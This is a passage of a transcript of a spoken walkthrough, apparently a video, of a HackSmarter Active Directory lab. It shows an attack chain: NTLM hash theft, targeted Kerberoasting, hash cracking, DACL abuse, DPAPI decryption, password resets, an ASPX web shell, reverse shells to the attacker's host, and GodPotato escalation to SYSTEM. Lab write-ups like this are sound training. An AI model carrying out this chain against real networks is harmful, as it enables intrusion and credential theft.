then you have put prepended to it, and then you have that in a input file, you can then pass that over into smb-client.python, and then it will do a put command on it will do a put command on each and every one of these files and put it all into that specific share that you are trying to write to. And so that's how you would do it if you didn't know exactly what type of file works in order to get the NTLM theft. In this case, Slinky almost always works. I always use Slinky first, like the netexec module, so I normally never do the NTLM theft until I absolutely have to. So what user do we need? We need Clerk John, and we need his password, which is Clerk Hill. And this should be fine. This should work. So this is the command that we got. And let's go to City Council. Let's do this. And this is simply because we have a read-write on uploads. So what read-write means basically is we're able to write a file. If we were to do SMB clients, Python, and then we do domain / and then the username, which is Clerk John, and then the password, which is Clerk Hill, and then we do at the target. We can connect. We need to do shares in order to list out the shares. We need to use uploads, and then we can see right here we have the bingus.link file that we created using the using the what's it called? The Slinky module in netexec. We are able to create the LNK file, and that gives us the hash of John Peters. Okay, so Vim, and then let's do John for John.Peters hash. Just keep it a little organized, and let's do hash cat on John Peters / ops sec lists q txt. And we can see we have the password for John Peters now, which is here just 1234. Here's Johnny. Shining reference. So let's do this. John.Peters, and then 1234. Here's John. Okay. Just make sure that that's actually the correct way of spelling it. It is not. So that is, again, another reason I like to always copy and paste password, so then you don't mess up. Okay. netexec, let's quickly check if we can actually log in as John.Peters using the netexec. Using this exec command. Targets. See, we get a status login failure. It is probably because I spelled something wrong. Oh, it's because I didn't put the password. Sorry. Okay. There we go. We get authentication as John Peters. Oops. And so, as you can see, I'm getting more disorganized as we go on. Just the nature of the game, I guess. Hashtag disorganized life. John Peters. We get John Peters. So we can do -- shares and just see if he has any access to any other shares to anything. Okay, he has read-write on uploads as well. Let's go ahead and look at the BloodHound data. It has been completed properly, so we can see that the file ingest actually worked. So explore, and then let's go to John.Peters and see what he has to offer. So John Peters, he's a member of those groups. Doesn't really matter. He has outbound privilege on 7 things. So he actually has outbound on Paul Roberts, Mariah Clark, and Nina Sato. So generic right, the way that you would abuse generic right is you can do a DACL or you could do a shadow attack. You can do a DACL right in order to get the ability to do a targeted Kerberos on them, I believe. Or you could do, hold on, let's just check. Let's just check instead of lying straight to my through my teeth. Yeah, you can do a targeted. You don't need to do the DACL, right? You can do a straight up targeted Kerberos on that specific user. So we can try and do a targeted Kerberos on all 3 of these users. I'm gonna try and use PowerView.py to do this. I've never used PowerView.py to do targeted Kerberos, but PowerView. Hi. Let's go ahead and take a screenshot of this. So we have generic right on all 3 of these users. And then let's just paste that in. Accidentally created a box there. So we have generic right on all 3 of those guys. Let's go ahead and do PowerView. And then it is $domain john.peters. And then it's going to be the password, which is 1234. Here's Johnny. And then we need to do the target, which is $target. And there we go. Get access to PowerView.py using that command. And let's just go ahead and put that in here. Okay, so do a help, that doesn't work. Do a dash help, that will work. So here, can we do a grep? Cannot. Can we do a grep? I can see a couple of things. Kerberoast. No, we cannot grep. So we can go into the documentation and then just check again. So this is invoke Kerberoast. Let's see if invoke Kerberoast does anything for us. It does not. Let's see if we can do a targeted. Targeted. So let's see if we can do SPN. Invoke. So what does it say? Request Kerberos ticket for a specified SPN name. So if we try and do Kerberos and then we try and give the specific SPN. So let's go to BloodHound and do they have an SPN set? They do not. So we have to set the SPN somehow. So doing targeted Kerberos. Sorry. Go ahead and open this in a new file so then we can see what exactly we're doing. So here is how we are setting the SPN. I'm sure there's a way to do it in PowerView.py. Set SPN. Set SPN. Are we able to do SPN anywhere else? Okay, doesn't look like it. But maybe there's a way to do it. Maybe there's a way to do it. Let's go ahead and let's copy all of actually let's not do that. Let's copy from here. And then let's go to Claude and just ask really quick, hey, there way to set SPN PowerView Python to do target Kerberos. Is it smart to show you that I'm using AI to do this? Probably not. But yeah, let's see. Just ask real quick. In the power view, blah, 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 there is this set, and then we can do a fake SPN. Okay. So this is the way that we would actually do it. So we need to get the target user, which is going to be, for example, Nina. So let's ask Nina. Go here. Okay. So we do something like this. We have a fake SPN set for Nina. Okay. So that worked. It is quite surprising that it worked. Cool. So we are able to set SPN with Nina. For Nina, do targeted Kerberoast. Okay, so now we can do invoke Kerberoast. If we do invoke Kerberoast just alone, that won't work. But if we give the SPN that we set, maybe. So how exactly do they want us to identify or do identity? Identity dash identity then to Nina Sato. So there we go. Now we get Nina's. And so what if we just do Paul? You know, like what if we just do Paul without setting their SPN? Just to see, you know? Paul Roberts. That's his name, right? Paul Roberts. So that doesn't work. So this is an example of, well, it might not work because a few reasons, but you get the Kerberoastable hash here. So go here and fuck. Okay. That doesn't paste nicely, that's fine. Nina Nina hash. And so that really doesn't like this. Control V. Get rid of this. Quit. Oh, it is like %s \n \g or something. /g. I don't know. Maybe /g. That I don't remember. %s /g. No. /n /g. That is that's my memory of it, but it is not that. It is 2 forward slashes, and it is a /s. So okay, so /s \n /g. There you go. And so if we cat out Nina's hash and we copy it into our clipboard, put it into our notes. So Nina Sato's Kerberoastable. There you go. Hey, there's faster ways to do this. There's better ways to do this, but you know, it is what it is. So we can try and do another set and then try and do Paul Roberts instead. And we have to actually change the SPN name here, otherwise this won't work. We could try. So we get an invalid operation there. And so if we just change this to SPN2, we'll get it to work. So there's a quick little error tip right there, just to show you how the SPN setting actually works. You need to set a unique SPN for each user in order to do the Kerberoasting, the targeted Kerberoasting. Okay, so let's see. Service principal name is set to something else. So now we can do a invoke Kerberoast, and then we can do dash identity, and we can do Paul.Roberts, and that doesn't give us anything. Okay, that is cool. Did I do anything wrong? Did I do anything mistakenly? So this might just mean that we're not actually able to Kerberoast John, or Paul Roberts. It could also mean that we are doing something wrong here. It might just not have it. I don't know. We didn't. Okay. And let's try Mariah Clerk now. So if we just did Mariah Clerk like that, work. Okay. Invoke. Maybe it automates it. I actually don't know. So it could be that PowerView.py automates it. We're not able to test because these users don't actually have a Kerberoastable hash. So kind of interesting. So let's set the SPN for Mariah Clerk, and then, for example, if we wanted to do a proper like cleanup as well, you should remember what the SPN. I guess they don't have an SPN set because only computer accounts should have SPN sets, not user accounts. I guess you can remove the SPN as well. So we can try and figure out how to remove the SPN from power using powerview.py as well. Let's try and do a targeted Kerberos here. Doesn't work. So the only user that we were able to get a actual hash from is Nina. And so let's do hashcat, and then let's do Nina, and give the word list. Secless, we get a little notification from Claude. Q.txt. So we get an invalid because there was a space there. Hey, we get the cracked hash of Nina, and we get 123 Nina 321. And so, for example, like if the password scheme was a little bit stronger, and like we probably wouldn't be able to crack these hashes. But a lot of times people use like you might be able to if you did like a rainbow table attack. You could do all types of different attacks in order to crack these types of hashes. And because it's something that you can do offline, it makes it so that it is very possible. But yeah, always set a very use a password manager. Basically, was what I'm trying to get at. um, and then dots. So okay, so let's just quickly verify using SMB targets. And then Nina.sato, and then password of Nina's is this dash shares. And we can see Nina has access to backups even before get the outputs. I know that. So we have backup read. Another thing that I would do, just so I can show you something, is I would do a cipher query, and I would actually do shortest path to shortest path to system trusted for unconstrained delegation. So we can see that there isn't really any other non-standard administrator accounts. You can also see that this administrator account is actually enabled. Yeah, it is enabled. See another thing. So the administrator account is enabled. Let's go to remote management groups. So for example, like remote desktop would be another. So this if any user was in the remote desktop group, they'd be able to RDP um, into the server. But because there's no users there, there's nobody who can RDP. Let's try and do remote management. So if they have remote management, that means that they can WinRM in. We can see that there is one user, and we can see that this user is Sam Brooks, and we can see that there are actually disabled here. So enabled and then false. And so outbound controls see that Sam is disabled, but he is able to actually remote in. And so we can do inbound right here, and we can see which users are able to get inbound access to Sam Brooks, and we can see that Emma Hayes has inbound, and we can try and see who has inbound on Emma Hayes, and we can see that there's no users that actually go directly into Emma Hayes, so we're gonna have to try and figure out a way to get to Emma Hayes without direct like without compromising another user. We're gonna try and find her password basically in order to get to Sam Brooks, because that will be at least in these like CTF type of situations, and also just in real life. I think you are always trying to get onto a Windows machine in order to get remote access to like a shell to make your enumeration life a little bit easier. Um, it does sometimes make it easier at least. So we have Nina and we have their shares. So let's try and do SMB clients.py and do main. Voice is getting tired. And so Nina Sato. And 123 Nina. And let's do target. I don't even think you need target, I'm gonna be honest. Ah, you do. And you needed to actually have a dollar sign. There you go. So let's use backups. And let's do ls, and we can see that there is two directories. I can tell that it's a directory if we zoom in a little bit. you can tell that it's a directory because there's a D at the end right here. Let's do back out. So cd, and then let's do document backup. We can see that there's 2 documents here. Let's do mget star. This will get both of the PDF document as well as the staff context.txt. Let's cd back or cd dot dot in order to go back. Go into the user profiles. We can see that there's 2 wim .wim files. So these are backup profiles of the Windows users here. So let's do get or get star. Okay. See, this is gonna take a little bit of time, I guess. Let's close out of this. See that we are getting all of this SMB information because we did the responder on the ton 0. We can go ahead and stop, and I guess normally you would want to save this into a file, so we can save this in. See, this is Dante. Oops, it's just not. Let's not save. Quit without saving. Close that. Close this as well, and we can see that both of the files have downloaded. Oops, accidentally exited out of my power view. That's fine actually. We don't need that, and we actually don't need this either. And we don't need the responder right away here as well. So let's close that. So have this file. Let's create a directory called, oops, there we go. Make directory, and let's call it wim. And let's get both of these. Actually, let's call it backup, because that is the actual name of it. So get their backup profiles as well as the what's it called? These 2 thingies. This CD backup. Shell A and just C. So this doesn't really show any important information. We can open it up as a PDF file, but we can see that the official records, blah blah blah, maintenance. It's just some stuff. We can see that we got a user list right here. So a leaking of the emails of each of these users. We can see that there's one user, a little bit of a hint is temporary IT admin covering for Emma Hayes is clerk John. So this is the temporary IT admin, maybe, and can get us some information as a little bit of a hint. Hopefully that might actually responds. It does not. Okay, whatever. That is fine. So we have these .wim files. There is a couple of ways in order to do this. I think wim apply is the tool that we need to use. So this is in order to you need to do like a sudo pacman and then install do wim apply or whatever. Okay. I don't know what it is called, to be honest. There's a package basically that will get you the wim apply tool in order to extract these as their user directories, basically. Let's see. I don't actually remember how to do this. So I'm just gonna ask AI. How would you extract a .wim file on Linux? So there's the Wim library tools. You can do Wim extract, or you can do the entire image like this. So the image name, and then you do a 1, and then the output path. So it is basically just Wim apply, Rick John 1, and then the output path is going to be dot, as in like this directory dot slash, and then we can say this is going to be clerk John underscore. So this got us that directory. Let's go ahead and do this for both users. Wim extraction. So as you can see, I'm not taking the best of notes. I didn't take the notes of getting the backup files. So something to keep in mind if you want to do this a little bit slower. I just want to speed up a little bit because I think I'm taking a little too long. But yeah, okay. 1 and then /, and we can do sam.brooks -1. And we get both Sam and Clerk John's directories. So this directories, and let's try and enumerate this now. So let's go into Clerk John. We can see there's the desktop ini, there's some stuff. We can see that there's this credential file, which is a DPAPI file that might be interesting in order to exploit. See other things, there's some DB files here, there's some stuff. User data, nothing really. Nothing really interesting here, nothing really interesting here. There's some app data stuff, but nothing interesting there. Temp directory, nothing interesting there. Let's try and go into their actual desktop environment. We can see that there is actually an email file here. Let's yank that and let's make a directory and call it useful. Let's put that into the useful directory. That's something that might be interesting to us. Go into there into Sam Brooks. And let's actually look through this as well just to see if there's anything else. Mainly just all empty. There's an XML file here, it doesn't have anything in it. Let's see anything else. Nope. Temp file, temp directory, there's a history, local. So we can see that there's no DPAPI here. There's nothing in any of these. We can see in the desktop there's an email. Let's go ahead and yank that, and then we will put that in as useful. And let's see. Let's go back into the backup for John. Go into app data. We saw in Microsoft local roaming, we saw this DPAPI credential. Let's go ahead and put that into useful as well. And what else do we see? What else is interesting? So there's more information, credentials. So, okay. Oh, there's another instance of that. There's some keys and crypto stuff. This might be interesting. Could be the key to the DPAPI. And let's see. Data, low, end users, taskbar, all that stuff. Nothing really interesting there. Cred history, sync history. Looks like there might be something in here, so I'm gonna yank these as well. Let's see. Alt, Windows, accounts. Bluetooth, nothing there. Data, just make sure one more time. Okay, I'm missing anything. So yes, read line. So here is a console history for PowerShell in the Windows file. Go ahead and put this into useful. Okay, so let's go ahead and read this console. You can see that there's a password being used right here. And it's being used to do some stuff, doing a command, and it is for Emma Hayes. This is the user that we're using. So something to note. This is the PowerShell file. Let's do a quick move from here. Let's go back, go into here, Windows PowerShell, this, and let's just copy the actual location of this in order to be able to show that, hey, this is the location of this PowerShell history, and it is leaking a password. Emma Hayes, and then their password right there. So Gemma for James exclamation mark. Okay. And this is for Emma Hayes. And this is the user that we were looking to get in order to get access to Sam Brooks, which has access to the remote management in order to get access to a shell. So is a long process, but we're working through it as fast as we can. So let's do a netexec SMB. SU, Emma Hayes, and then let's copy their password so that we don't mess it up. -P, and we're missing the IP. Let's go back. Target, we can see get authentication shares just to see if they have access to anything else. They probably won't because there was only 2 standard directories. But for example, if they had access to their C, then maybe we'd be able to do something with that. So we get auth, auth as Emma. Okay. So there is another way to do this. We have the DPAPI. Let's go to hacker recipes and try to see what's inside of the DPAPI secrets that we have seen. And so they're giving us a couple of locations for the DPAPI. So let's try and exploit that really quickly. So we can see in app data. So in app data roaming, protect, there is a GUID that has the let's see, what do they say? The data stored in their user directory is specific. They're located. Okay, so this is the data. This is the data file specifically. So DPAPI data is in the protect file. DPAPI data. And then let's go here. Applications like Google Chrome, Outlook, Internet Explorer, Skype use DPAPI. So any passwords that are stored for Chrome or Outlook or Internet Explorer or Skype or any of these applications, they're all stored via DPAPI. And so we can actually decode these credentials using this DPAPI, these DPAPI keys. And so below are some common paths that are usually hidden that contain DPAPI protected data. So this is the protected internal components, various passwords that are stored. So this is the DPAPI key, I believe, that's in protected, and this is the DPAPI credentials. So DPAPI key, and then DPAPI data. And so normally it is in these two. So do that, and we can see already. So let's go through, let's go app data, roaming, and then Microsoft, and then go protect. And we actually already got, oh, did we? I don't know if we did. So this is the SID, the S1, the S15, and then 21, that's a SID. And then this DE222D or DE222E76, that is the GUID. So let's go ahead and put that into useful. And just put this here. And then let's make a directory for DPAPI specifically so then we don't get confused. Let's put this here and then put the data here. So let's just rename this as data. Rename this as, and let's go into useful and then DPAPI. So we have the data and then we have the key. So we can use something like dpapi.py, which I don't know if I have. I do have it. So this is mpacket's DPAPI library, I think. Yes. So the master key file. So this is master key, then dash file. From Unix systems, on PAPI we can also do. Let's see. So the master key. Which one is the master key? I always forget. And there's like DPAPI is sometimes confusing, so let's just try and make sure that we do it correctly. So example of a SUID, example of this. Okay, I don't think I took good notes on this. That's fine. So master key, and then let's do the key file. And then let's do the SID, which is gonna be what is the SID again? So let's go back, go into their app data, go into local, go into roaming actually, go into Microsoft, and go protect this. And this is actually their SID here. SUID, my bad. At least I think, hopefully. Again, I don't normally should know how to do this, but alas, here we are, struggling. And then password. Oh, master key password. Yo, I don't think this is correct. I don't think the way that we did this is correct. So, protected file. Data. So I actually don't know which file is which, to be honest. File, data, file key. Yeah, we might have fucked up by renaming this, honestly. We'll try. We'll try. We'll try. We'll try. See what happens. So DPAPI apply master key dash file, and I think the master key is key. Hopefully, dash SID, and then I believe this should be the SID. Hopefully, dash password, and then the master key password. I don't know the master key password, so yeah, okay. How do you get the master key password? So, okay, extract and decrypt the master key. So this is what they're doing. They're doing DPAPI master key and this is protected. And then this password, where are they getting this password from? So let's go back into backup, app data, roaming, Microsoft, went to protected, and maybe one of these is the password file. I'm not 100% sure. Where are they getting this password? Extract and decrypt all master keys. So this is using Mimikatz, decrypting Chrome data. Okay. Let's try and ask AI because I'm not 100% sure. We have master password. Good question. If you have the backup key, if you have a SUID and then plain text password, the user password. Oh, that's what they're asking for. They're asking for the user password of They're asking for the user password of the user that we are trying to get at, which is backup Clerk John of Clerk John. We know Clerk John's password, which is Clerk Hill, I'm pretty sure. So if we scroll up, we can see John Peters, Clerk John. His password is Clerk Hill. So yeah, okay. So here, go back, do this DPAPI. We do Clerk Hill. So this gives us the decrypted key. So that's good to know. I didn't know that that was what they were asking for. So that is good. We're the password of Clerk John. And so let's go ahead and copy this. Clerk Hill. And so we get this decrypted key now. Decrypted master key. And so now, with the decrypted master key, we can do obtain the backup keys and use it to decrypt a master key. decrypt the protected data using a master key. So this is what we're going to do next. So the protected file. So we're going to do DPAPI.py, and then we're going to do credential dash file. Okay. And then we're going to do the protected file, which is going to be the data. And then the dash key is going to be the key that we just got. And there we go. Here is another method in order to decrypt DPAPI and reveal the password of Emma Hayes. So we can see this right here. Okay, cool. So we have Emma Hayes now. CD back, and then let's do the Griffin command again on the BloodHound data just to see where we're at. So we can see now that we obtained John, we obtained John Peter, we obtained Clerk John, and then we obtained Clerk John Peters, and then we now need to get to Sam Brooks. This is the user that we need to get to, and we have right Dackle on Sam Brooks. So let's see. We need to get to Sam Brooks. We have Emma Hayes. Let's go ahead and make sure that we can actually authenticate using Emma Hayes. So you and password this. I think we already checked before, but I'm just going to recheck just to see. So we have authentication with Emma Hayes. We have right Dackle. So let's go ahead and close all of these tabs because why not? Open a new tab and do right Dackle. And so this is an example of how to do right Dackle using Bloody AD. I don't want to use Bloody AD here. I want to try and do the right Dackle attack from PowerView.py. Let's go ahead and copy our BloodHound, our Bloody AD. How can we do this using PowerView.py? Right Dackle. Right Dackle. Using PowerView.py, we can do, so we can add the right Dackle, and then, or using full rights to get generic all. So what we're going to do is we need to do the generic all version. Adding generic all with PowerView. You can see in the bottom, this is adding generic all using Bloody AD. And we can already see that like I have the correct whatchamacallit. I have the correct thing for this. So we need to do domain and then Emma.Hayes. And I need to put the password in, which is Gemma for James. Get in, port must be an integer. Sorry. And so let's go ahead and do --help just to see. And so this is the command that we want to run. It's being strange. Go ahead and put this here. Yeah, why the fuck are you being that way? So it is a add. Try and do it this way. So add and then dash main object ACL. So that is what we're trying to do. We have this misspelled. So domain object ACL. So we're trying to add an ACL, and then we're trying to do the target identity. And the way that you would find this target identity is you would go into the BloodHound data, or you can go into Bloody AD. So another way you could enumerate this. So let's exit out of this version. And we can do Bloody AD, then dash U, and really doesn't matter what user you use. So like here, for example, if we do Bloody AD, actually no, it doesn't matter what user you use. We do Bloody AD, then dash U, you dash H, I think. Target, then dash dash U, Emma, A's, dash P, then Gemma for whatever. What is it called? Gemma for James. So and then get object or get writable. Okay, so we have this get writable. Now we can see a couple of things. We have Sam Brooks, which we can do the DACL write. We have create child on these OUs and web admin. We have DACL write on Alex King. So there's a couple of people that we can exploit, and there's a couple of things that we have write over. Let's see what we can do. So for everybody that we have DACL write, we can turn that into a generic all. We can escalate our privilege from DACL write into a generic all is basically what I'm saying. So let's try. We need to take this distinguished name right here. And so this is the target identity that we require. And we can see that that is correct. And then we need to do dash principal identity, and then we're giving it to Emma Hayes. So we're giving all rights to Emma Hayes, basically, instead of just having DACL right. So principal identity, go do that, and then let's just see here. So Emma.Hayes dash rights and all. Let's try and do that. Let's see. Full control. Try that. Choose from full control. Try and do that. So now we have full control over the Sam Brooks user, which means that we should be able to change the password of Sam Brooks now because we have generic all. So if you were to relook at our, I think if we do get writable now, it should show that we have, yeah, so it's updated. We have rights and we've actually updated our permissions by using this command in. We need to full screen there in order to actually see the full command. Here's the full command. We've given full control over the Sam Brooks object, and let's see. Let's see. Okay. Now we must do a password change. So, not 100% sure how you do a password change with PowerView.py. Let's see if we can see in the documentation. Password. So set password, set domain password, and then set domain password for specific user. Let's try and do that. And do dash help. So then we do dash identity. And then the user that we're trying to set the password to or for is, so we're doing outbound, and then we are trying to get onto Sam Brooks entity. And so let's do Sam Brooks without the email, and then let's do account password, and then let's just put password 123 like that. So no principal object found in domain. Try and see what exactly are we doing wrong here. Reset, force change password. So we need the SAM. This is the SAM. Use the SID. Nope. Get username where display name is this. Format name is incorrect. Okay. So what did they do differently? They changed naming convention from Sam Brooks to Sam Brooks with a space. They changed the naming convention from Sam Dot Brooks to Sam Space Brooks. What? What the fuck? Why did that work? Okay, we need to use the Sam account name. Whatever. Let's go ahead and put this in. Set password. Something like that. Okay. So we've successfully set the password of Sam Brooks using rv.py. Now we need to re-enable the account because the account is currently disabled according to BloodHound. Member of, right up here, we can see that enabled is false. So now we need to ask, do a -- help, and then copy and paste this again so we can re-give the context. How would we enable the Sam Brooks account? Blah, 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 blah. Let's see. So there's actually an enable account thing. So if we had searched up enable accounts, enable YOLO mode. Okay, that's interesting. Let's see. So we would do enable account, and then we would give the CN of that user, or we can try the SAM account name directly. Okay, so is that simple? That is how you enable the account using rv.py. Interesting. So let's just put this into our thing. That is a set password command. Enable accounts. Sorry. Give the SAM account identity. So we could have maybe looked through this and figured out that, oh, there's an enable account somewhere in this large list of things that it can do. But okay, that is cool. Now it is enabled. This will mean that we can actually WinRM in as the Sam Brooks user. -u, then sam.brooks. Brooks -p, and we set the password to password123 exclamation mark. And we have gotten user. Very cool. So here we go. We've gotten user access. We do who am I, hostname, hostname. See, we're on DCC. CD, then desktop, and we can see that we have the user.txt. That took a long time. That took me 2 hours to get used. But it is what it is. Let's see. It isn't actually a really complex chain. It's because we're using new tools, and it's because we're not, trying to go as fast as possible that it's taken this much time. But it is interesting, the chain to user. From here to root, it shouldn't be too bad, if I remember correctly. If we go back and we do, what is it called? We do bloody AD. Maybe the bloody AD. It's not here. Maybe we have a bloody AD command here. We have the bloody AD command. Let's do get writable. And so we can see, okay, so we have another DACL writes on the OU. So we can go ahead and we can do the same like DACL write command that we had done before. Let's go ahead and put this in here. And so let's try and do this same command, except This time we're going to do the identity is going to be from the OU, which is this right here. And so we're going to try and give ourselves full control here, and that is successful. Okay. Give generic all over the OU. And let's copy this command. We're also documenting. Let's go. So we have added generic all. If we run that bloody 80 command again, we're going to see that we have more permissions now than previously, which is nice. Now, from here, we need to go and get web admin. So let's see. Web admin. Now, the reason I know to get web admin is because we didn't actually fully enumerate everything. If we go into useful and we actually look into these emails that we have gotten, if we read them, it will start to give us some hints. So if we do a cat on the email, we can see Emma Hayes to John. Credentials. I'll share the credentials with you via our approved channel. And we can see that they're doing a DPAPI note to see, like, okay, here is how it's encrypted. A local domain admin can technically recover the DPAPI protected secrets. And so that is the initial hint in order to do the DPAPI attack. That was on the desktop. And then we can see the hint for root is on the other user, on the SAM user. We can see it is, hi Sam, we have moved the web admin account from this is a notice, which is like web admin account moved to the quarantine OU. And so basically what we're trying to do is we're trying to move the web admin from the quarantine OU into the other OU in order for us to have generic right or generic all over it. And then we can see that the web server has a ASP.NET enabled and file uploads of .aspx files are possible, which means that we could do an ASPX shell, and that should be able to give us access to the web admin, whatever is running the web, basically, so the web user. And from there, we should be able to do a escalation of privilege in order to get administrator, and that will give us root. So now that we know where we need to go, we can cat those files again and just quickly put that into our notes just so we know. Check emails. So there we go. We know that this is what is required of us, and now let's go ahead and do the exploit chain. So we did this initial generic all to the OU and generic all. And so now what we need to do is we need to do we have to do a DACL. Oh no, wait, let's look at the permissions again. What is the permissions? What do we have? We have create child, actually. So OU, quarantine, and then we need to be able to move this user into the other OU, into the OU that we actually have generic right over, or generic all over. Okay. So create child node. Let's go ahead and ask AI what the fuck this means. What does this permission entail? What do we do with it? Power view. Hi. How can we move the web admin into the so this means that we can create a child. You can create new objects inside of the OU. You can also modify attributes of the OU. you can do this, okay, which is very powerful. So to move an object, so this is what we're trying to do. We're trying to move. We are trying to move the web admin from the quarantined OU to the city OU where we have more permission. So let's try and do that. And we need to be in the shell. What is it called? The in the PowerView.py shell. And so we successfully modified the DN. And so now they are actually in the other thing. So let's see. Web admin, now we have DACL right over web admin. So now that we have DACL right over web admin, we are actually able to do the same attack chain that we did before. So again, it's not as complex. We're basically just gonna we have DACL right, which means we can do generic all over them, and then this will allow us to change the password basically. And so I believe you should just be able to straight up just be like, hey, we want to change the password of this individual. Let's see. Generic right. So normally you have generic right. Let's try and do this. So what is this user's actual SAM account name? It's web underscore admin. And let's change their password. This fails. Okay, this is fine. What we need to do is we have DACL right, so we can do the full control. Right. So we can do this full control over the web admin now. I believe identity. And then let's get the CN of this guy. The distinguished name. Oops. What did we do there? Shit. Let's go back to our right DACL notes. Here it is. So add target identity, and then it is CN, and then writes all. This is incorrect because we remember that this is actually, we need to do full control. And then we need to change the CN here. Target identity. Oh, okay, wait. Domain, target identity not found in domain. Oh, right. We've changed the domain. I forgot. This is now. We've actually already done it. So right here, we've done it. When we tried to set his domain password, we've actually gone and done it right here. So we've changed the. We're trying to do this in quarantine. Our BloodHound data is incorrect. So there we go. Now we have generic all over this user. And then like the set password, like it's already worked, but we can do it again. And now it works. Okay, so the issue there was we were using the wrong CN because we were using the quarantine one instead of the one that we actually have more permission on. That little change right there made it work. So let's just make sure that we have this. And let's make sure that we actually put in the right CN here. Common name. Okay. There we go. So this works. Why are you talking to me, Claude? So now we have changed the password of web admin. Now we can try and evil win RM with that web admin, but We know that web admin isn't actually in the remote users group, so they're not going to be able to remote it, but we can try anyways. P, and we know that the password is password123 exclamation mark. We can see that I'm stupid and I didn't put the IP. Okay, so we can see that this fails. Evil WinRM fails. Now let's try instead, since we already have a shell here, we can actually just use run as CS do this. So let's go ahead and do that. We're in program data. Let's go ahead and upload /opt tools windows and then run as .exe, run as C. And so that's where I locate, that's the location of my run as. Do dot this and do that dash help and just see what kind of commands we can run. So we can see we can do a cmd slash and then a command. So who am I? And then we can put the username and the password here. So we know that it is web_admin, and then we do password123 that, and we can do the who am I, and we get a proper code execution as the web admin. So let's go ahead, upload the run as.exe binary, and then run a command as web admin. So there we go. We got a who am I. From here, what I would do is you can go and get a rev shell, for example. So let's go ahead and remove that. Do Penelope-P 9001 and this 61 9001. This is going to work. Do PowerShell and go ahead and grab PowerShell B64 encoded and copy that. We do this. Instead of doing who am I, go ahead and run that, and we should get a connection back. It might not work because of the way that run as works. We shall see. Doesn't work. Okay, that's fine. It doesn't work because we need to do --force file, and we need to do --bypass UAC. Parameter is incorrect. That's fine. So we're doing it incorrectly. Just try and run it like this with --force -profile and then --bypass -UAC. This is incorrect. Let's go to run as and actually see what we need to do. So we can see this is the actual command that needs to be done. So we can actually just do a reverse shell using, okay, wait. So we do cmd.exe. There we go. Oh, didn't work. That did not work either. Okay. That's fine. We'll do it the other way then. Force you hang. That's fine. Let's do it this way. Oops. City council to go to the bottom. This. So we're gonna do run as CS, and then you can actually do a rev shell with run as. Let's try and just do run as.exe --help. Need to do the backslash there. --help. And I think they have a thing, yeah, so remotes, so redirect standard in and out to a remote host. So if you do -r and then you just give the IP address and then the port number, you should be able to go ahead and do that. So go to a basic command, and we'll do -r and 238 61 the 9001. This is how it works, right? Yeah, it is. So that works, but it doesn't actually work. So 3 arguments required. Okay. There you go. So we've created a background PID. Now we have web admin user. We can go into, sorry, spawn a PowerShell, and then let's go into init pub. LP, okay, there we go. So we can do an echo. Let's go into www first, actually. Www. Okay, let's do echo and test, and then put this into a test.txt. We can see that we have just generated a text.txt right there. Let's go ahead and remove that text.txt, and then let's go into uploads, cd uploads, and we can see that there is a test.aspx. Let's go ahead and do shell aspx file. Get a file for this. We can go ahead and copy this into a file for us. So let's do one back, do shell.aspx. Copy this and put this into a file. Then run a Python server right there. So all that was python-m http.server. And we're starting a Python server right there in order to get the file. So we can do a wget, probably not wget, do a curl. Yeah, we can do a curl http //10 238 61 8000, and then the file is called shell.aspx, and then we do -out shell.aspx. That went ahead and worked. Now, if we go to the website, so we need to go back. What is the IP address here? Okay, we have the IP address. We go ahead and visit the website again, and we go into the uploads directory. Shell.aspx. See if that works. Uploads, and should be shell.aspx. There we go. So we have a working ASPX shell here, and we can do a who am I. And so from here, we can go ahead and do another Penelope 9002, and we can go ahead and just change this out. Here, this should just work. Let's try that. Got another shell. Who am I? You can see we are actually a different user. We're no longer web admin. We're the default user right here. Yeah. And from there, let's go ahead and do a who am I /all. You can see that we have SE impersonate enabled. So go ahead and do this, SE impersonate enabled. Put this into our notes. So another thing we can do, let's go into program data, and we can upload another file. So let's upload from this other WinRM shell because it's a little bit easier to do than having to host the file. And we can do upload, and then it's going to be /opt tools Windows, and then I'm going to upload godpotato.exe, and then I'm going to say godpotato.exe. And so that's going to go ahead and upload, and then from here we can see that we get godpotato, and we can do godpotato.exe, and then godpotato.exe help. It didn't upload properly, maybe. Again. Okay. Because that user doesn't own it. So what we're going to do is we're going to start a Python server in that directory. So we're starting it in the op directory that actually has the what is it called, the the god potato binary, and then we're gonna just go ahead and curl using this user. And just to make sure you're not confused, I am the IIS APOL user that has the mi/all that has the SE impersonate priv, and so we can do curl HTTP and then our IP, our ton0 IP 8000 god potato.exe, and then do a -o do god potato again potato.exe. Now we should have the correct permissions to actually run the binary. There we go. And then we can do a -cmd, and then we can give a command. So do a /c here, and we can generate another reverse shell if we wanted to get ourselves a administrative count. We can just do who right here just to test that it works. Hopefully it works. Maybe it won't work. I don't know. I don't know what's going on. /c. Okay. Maybe we use the command wrong. Who am I? Who am I? God potato, come on. So this might just not work. Might be the end times. Bad. All right. Cool. We will refresh our page. Who am I? So this is like dead. Okay. Oh my god. The machine like stop? God. That's so crazy. We were going that hard that the machine actually stopped working? Are you kidding me? You gotta be kidding me, bro. Oh my god. We were literally right at the end and the machine stops. This has to be a tragedy, bro. Oh my god. What is this? What is this life we live? Oh my god. We were right at the end, man. Holy SMH, my head. All of these shells are broken. Alright, that's fine. Luckily, this is a good example of why HackSmarter is actually good, is because it saves state. So all of the progress that I just did, if I had done it on Hack the Box, literally everything I just did would be lost. At least with HackSmarter, like the state is saved, so I actually keep all of the progress that I have made and not have to like pull my hair out and have to redo everything to a certain point. So something that's nice. Something that is a little bit nice. So let's just go ahead and try and see. We have this yet? No, we don't. Still loading. Still loading. Okay, it's fine. Hubris. That's what it is. Hubris. Hubris. I have no idea why it stopped working. Maybe we crashed it instead of like. I might have crashed it. I'm gonna be honest. I might have crashed the server instead of it like just dying on its own. Normally it shouldn't die like that. Normally. Here we are. Okay, so we're pinging. Able to ping. We're able to visit. We were able to visit. Go ahead and go back into our shell. But it is yes. Oh. Yo, what the hell? What is this life? This is life we live. Uploads. Shell.aspx. Please be there. No. Oh my gosh, okay, thank God. Thank God. Oh my gosh. Oh my gosh. I would have cried. I would have cried. Live. I would have cried. Okay, let's set up a listener and get her shell back. Execute. Get her shell back, please. The server might not be up yet. Our impatience is okay. We got an invalid shell. Who am I? Okay. Lead works. There we go. Who am I? There we go. The program data. We should still have our god potato. We do. God potato.exe dash help. Dash cmd slash c. Who am I? NT authority. Let's fucking go. Okay, so now do another reverse shell. I think there's a easier way to spawn a shell with God Potato, but I don't remember exactly how. I think you 